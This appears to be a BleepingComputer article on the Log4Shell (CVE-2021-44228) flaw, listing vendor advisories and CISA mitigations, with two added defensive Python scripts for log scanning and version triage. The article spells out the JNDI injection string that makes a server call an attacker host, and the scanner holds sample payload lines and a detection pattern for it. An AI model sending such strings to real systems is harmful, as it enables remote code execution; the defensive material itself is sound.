Log4j: List of vulnerable products and vendor advisories – BleepingComputer

List of Log4j vulnerability advisories, patches, and updates

News about a critical vulnerability in the Apache Log4j logging library broke last week when proof-of-concept exploits started to emerge on Thursday.

Log4j is an open-source Java logging framework, part of the Apache Logging Services, used at enterprise level in various applications from vendors across the world.

Apache released Log4j 2.15.0 to address the maximum severity vulnerability, currently tracked as CVE-2021-44228, also referred to as Log4Shell or LogJam.

While massive exploitation started only after exploit code became freely available, attacks have been detected since the beginning of the month, according to data from Cloudflare and Cisco Talos.

The Log4Shell flaw was reported by Alibaba’s Cloud security team on November 24 and it is unclear how some attackers were able to exploit it this soon.

In a statement on Saturday on the Log4Shell vulnerability, Jen Easterly, the director of the Cybersecurity and Infrastructure Security Agency (CISA), says that the agency is working with partners in the private and public sector to address the issue.

“We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies — and signals to non-federal partners — to urgently patch or remediate this vulnerability” – Jen Easterly, Director of CISA

Log4Shell is a Java Naming and Directory Interface (JNDI) injection that allows unauthenticated remote code execution. Adversaries can leverage it by changing the user-agent in their browser to a string in the following format: ${jndi:ldap://[attacker_URL]}.

The string will remain in the victim web server’s logs and will force a callback or request to the attacker’s URL when the Log4j library parses it. Attackers can use the string to pass encoded commands or Java classes to the vulnerable machine.
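Because the string stays in the web server's logs, those logs can be searched for it. The following is an added example, not code from the article or from any vendor: it scans access-log lines for the lookup format quoted above and extracts the callback host. The combined log layout, the sample lines, and all names are assumptions; it also checks the request line and referer, which goes beyond the user-agent case the article describes.

```python
import re
from urllib.parse import unquote

# The lookup format quoted in the article: ${jndi:<scheme>://<host>...}
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/}\s:]+)", re.I)

# Apache/nginx "combined" access-log layout (assumed log format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Constructed sample lines (documentation IP ranges, .invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [10/Dec/2021:09:15:40 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://callback.example.invalid/a}"',
    '198.51.100.7 - - [10/Dec/2021:09:15:41 +0000] '
    '"GET /?q=%24%7BJNDI%3Aldap%3A%2F%2Fcb2.example.invalid%3A1389%2Fa%7D HTTP/1.1" '
    '404 0 "-" "curl/7.79.1"',
]


def find_jndi_lookups(lines):
    """Return one record per JNDI lookup string found in a logged request field."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        parsed = LINE_RE.match(line)
        if not parsed:
            continue  # not in the assumed format; skip rather than guess
        for field in ("request", "referer", "agent"):
            # Decode percent-encoding so an encoded lookup is seen as logged text.
            for m in JNDI_RE.finditer(unquote(parsed.group(field))):
                hits.append({
                    "line": lineno,
                    "client": parsed.group("ip"),
                    "field": field,
                    "scheme": m.group("scheme").lower(),
                    "callback_host": m.group("host").lower(),
                })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(hit)
```

The extracted callback hosts can then be matched against outbound DNS and connection logs to see whether any server actually made the request.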

Advisories, notices, patches, or updates

Given the severity of the vulnerability and how easy it is to exploit it, CISA today released guidance for companies to set up defenses against Log4Shell attacks. The agency’s recommendation is to “apply available patches immediately” and to prioritize this process.

“Prioritize patching, starting with mission critical systems, internet-facing systems, and networked servers. Then prioritize patching other affected information technology and operational technology assets” – CISA

If patching is not possible, the agency recommends the following change:

Set log4j2.formatMsgNoLookups to true by adding the string -Dlog4j2.formatMsgNoLookups=True to the Java Virtual Machine command for starting an application.

This comes with the caveat that the system’s logging may be impacted if it relies on Lookups for message formatting. Also, the mitigation works only for versions 2.10 and later.
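The version limits above can be turned into a triage check. This is an added example, not CISA's or Apache's tooling: it classifies a deployment from the log4j-core jar file name and the JVM command line, using the 2.15.0 fix and the 2.10 minimum for the flag as stated in the article. The inventory, paths, status labels, and function names are constructed for illustration.

```python
import re

FIXED = (2, 15, 0)         # release the article names as the fix
FLAG_MINIMUM = (2, 10, 0)  # article: the flag only works from 2.10 onward
# Assumption: the library ships under its usual file name, log4j-core-<version>.jar.
JAR_RE = re.compile(r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?\.jar$")
FLAG_RE = re.compile(r"-Dlog4j2\.formatMsgNoLookups=(\S+)")

# Constructed inventory: (jar path, JVM command line that loads it).
SAMPLE_INVENTORY = [
    ("/opt/app-a/lib/log4j-core-2.15.0.jar", "java -jar app-a.jar"),
    ("/opt/app-b/lib/log4j-core-2.14.1.jar",
     "java -Dlog4j2.formatMsgNoLookups=True -jar app-b.jar"),
    ("/opt/app-c/lib/log4j-core-2.13.3.jar", "java -Xmx2g -jar app-c.jar"),
    ("/opt/app-d/lib/log4j-core-2.8.2.jar",
     "java -Dlog4j2.formatMsgNoLookups=True -jar app-d.jar"),
    ("/opt/app-e/lib/app-e-all.jar", "java -jar app-e-all.jar"),
]


def jar_version(path):
    """Parse (major, minor, patch) from a log4j-core jar name, else None."""
    m = JAR_RE.search(path)
    return tuple(int(part or 0) for part in m.groups()) if m else None


def flag_enabled(jvm_cmdline):
    """True when the command line sets the property to true (any letter case)."""
    m = FLAG_RE.search(jvm_cmdline)
    return bool(m) and m.group(1).lower() == "true"


def triage(jar_path, jvm_cmdline):
    """Classify one deployment against the article's fix and mitigation limits."""
    version = jar_version(jar_path)
    if version is None:
        return "unknown"            # bundled or renamed jar: inspect by hand
    if version >= FIXED:
        return "patched"
    if version < FLAG_MINIMUM:
        return "upgrade-required"   # the flag only works from 2.10 onward
    return "flag-mitigated" if flag_enabled(jvm_cmdline) else "exposed"


if __name__ == "__main__":
    for jar, cmdline in SAMPLE_INVENTORY:
        print(f"{triage(jar, cmdline):17} {jar}")
```

A file-name check misses copies of the library repackaged inside another archive, so an "unknown" result calls for manual inspection rather than a pass.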

Immediately after details about Log4Shell became known, vendors started to investigate if their products are impacted and provided information about the results:

Amazon:

Amazon has updated several of its products to use a non-vulnerable version of the Log4j component and announced that it is either in the process of updating others or will release new versions in the near future.

The company has published details specific for affected services, among them being OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass, and API Gateway.

Atlassian:

Based on its assessment, the company believes that no on-premise products are vulnerable to exploitation in their default configuration.

Modifying the default logging configuration (log4j.properties) to enable the JMS Appender functionality may bring the risk of remote code execution in some products, like Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, and Crucible.

Broadcom:

The company published mitigations and knowledgebase articles for several Symantec products affected by the Log4j vulnerability. These include CA Advanced Authentication, Symantec SiteMinder (CA Single Sign-on), VIP Authentication Hub, and Symantec Endpoint Protection Manager (SEPM).

Cisco:

Cisco has published a list of its products affected by Log4Shell along with a calendar for patching some of them starting December 14.

Affected products are from various categories, including the following:

  • Network and content security devices (Identity Services Engine, Firepower Threat Defense, Advanced Web Security Reporting Application)
  • Collaboration and social media (Cisco Webex Meetings Server)
  • Network management and provisioning (Cisco CloudCenter Suite Admin, Data Center Network Manager, IoT Control Center, Network Services Orchestrator, WAN Automation Engine)
  • Enterprise routing and switching (Cisco Network Assurance Engine and Cisco SD-WAN vManage)

Citrix:

While the investigation is still underway and the status may change for some of its products, Citrix has not listed any of its products as being vulnerable to Log4Shell.

ConnectWise:

The company’s cloud service, Perch, was found to rely on third-party components that were “potentially vulnerable,” reads an advisory from ConnectWise.

The vulnerable third-party component was identified as FortiGuard’s FortiSIEM, which is used by ConnectWise’s StratoZen solution, prompting the company to temporarily restrict access to the hosted StratoZen servers. Access is now restored to most of the services.

cPanel:

A forum thread shows that only instances where the cPanel Solr plugin is present are affected and could be exploited, but only locally.

A staff member provided additional peace of mind, announcing that an update with mitigation for Log4Shell is available to the cpanel-dovecot-solr package.

Debian:

The patched Log4j package has been added to Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), and 12 (Bookworm) as a security update, reads the advisory.

Docker:

A dozen Docker Official images have been found to use a vulnerable version of the Log4j library. The list includes couchbase, elasticsearch, logstash, sonarqube, and solr.

Docker says that it is “in the process of updating Log4j 2 in these images to the latest version available” and that the images may not be vulnerable for other reasons.

FortiGuard:

An advisory from the company lists almost a dozen of its products as being vulnerable, with fixes or mitigations already deployed for four of them.

FortiGuard announced that the advisory would be updated with the dates for applying fixes for other products, such as FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy, and ShieldX.

F-Secure:

Both Windows and Linux versions of several F-Secure products are impacted by Log4Shell: Policy Manager (only the Policy Manager Server component), Policy Manager Proxy, Endpoint Proxy, and Elements Connector.

The company has created a security patch for administrators to correct the issue and provided step-by-step instructions to deploy it.

Ghidra:

The open-source reverse engineering tool from the NSA received an update to version 10.1 that also upgrades the Log4j dependency to a non-vulnerable iteration.

IBM:

IBM’s advisory for Log4Shell shows that only WebSphere Application Server versions 9.0 and 8.5 were affected by the vulnerability, via the Admin Console and the UDDI Registry Application components, and that the issue has been addressed.

Juniper Networks:

The networking company disclosed that four of its products are impacted: Paragon Active Assurance, Paragon Insights, Paragon Pathfinder, and Paragon Planner.

While the assessment continues, at this stage another six products may be affected: JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics, and Security Director (not Security Director Insights).

McAfee:

The company has yet to complete its assessment and has 12 products under review and will update the advisory with relevant information as it becomes available.

MongoDB:

Only MongoDB Atlas Search needed to be patched against Log4Shell, the company notes in an advisory updated today.

The developer adds that it found no evidence of exploitation or indicators of compromise before deploying the patch.

Okta:

Okta released updates for Okta RADIUS Server Agent and Okta On-Prem MFA Agent to mitigate the risk from the Log4Shell vulnerability and strongly recommends that customers apply the fixes from the Admin Console.

Oracle:

Oracle said that “a number” of its products, without disclosing which ones or how many, are using a vulnerable version of the Log4j component.

The company referred its customers to the My Oracle Support Document and released a security alert with a strong recommendation to apply the provided updates “as soon as possible.”

OWASP Foundation:

An advisory on Friday revealed that versions of the Zed Attack Proxy (ZAP) web app scanner below 2.11.1 use a vulnerable Log4j component.

Red Hat:

Components in multiple Red Hat products are affected by Log4Shell, the organization disclosed on Friday, strongly recommending that customers apply the updates as soon as they become available.

Among the products listed in the advisory are Red Hat OpenShift 4 and 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8, and Red Hat Fuse 7.

SolarWinds:

Two products from the company use a vulnerable version of Apache Log4j: Server & Application Monitor (SAM) and Database Performance Analyzer (DPA).

However, both products use a version of the Java Development Kit (JDK) that is either not susceptible to the Log4j vulnerability or reduces the risk.

SonicWall:

An ongoing investigation revealed that SonicWall’s Email Security version 10.x is impacted by the Log4Shell vulnerability. A fix is under development and should be released “shortly.”

Five other products from SonicWall are still under review and the rest of them have been found not to be impacted by the issue, according to an advisory from the company last updated on Saturday.

Splunk:

Core Splunk Enterprise is not affected unless Data Fabric Search is used. The company published a table with the versions of its products affected by Log4Shell both in the cloud and on-premise.

At the time of writing, the company has released fixes for some products and is currently working on rolling updates for at least seven of its products.

VMware:

VMware has fixed several of its products vulnerable to Log4Shell attacks and is currently working to roll out patches for another 27 products.

In an advisory last updated today, the company lists nearly 40 of its products as impacted by the critical vulnerability. Many of them show a “Patch Pending” and mitigations are available in some cases.

Ubiquiti:

The UniFi Network Application, which uses the Log4j library, has been updated to address the critical Log4Shell vulnerability.

Ubuntu:

The Log4j package has been patched upstream, reads the security advisory, and the update now has to trickle to Ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo), and 21.10 (Impish Indri).

Zoho:

The company found that the ADAudit Plus component for auditing Active Directory changes, which is part of the ManageEngine monitoring solution, is vulnerable to Log4Shell attacks.

In a short post today, Zoho has provided instructions to mitigate the issue.

Zscaler:

Zscaler has patched several of its products that used a vulnerable version of the Log4j library. After patching all of its Private Access (ZPA) services facing the public internet, Zscaler Mobile Admin, and Support Mobile Admin components, the company concluded that the issue has been fixed in all its products.

Some companies may choose not to take action against the Log4Shell vulnerability, believing that running certain Java versions defuses any exploit attempt. This is not true, though, and they should update the Log4j library to its most recent iteration.

Márcio Almeida, senior security engineer at the Canva graphic design platform, warns that Log4Shell attacks work with any version of Java when adding support for LDAP serialized payloads in the JNDI exploit kit.

The researcher explains that for the attack to work with any version of Java the classes used in the serialized payload need to be in the application classpath.

Source of this news: https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
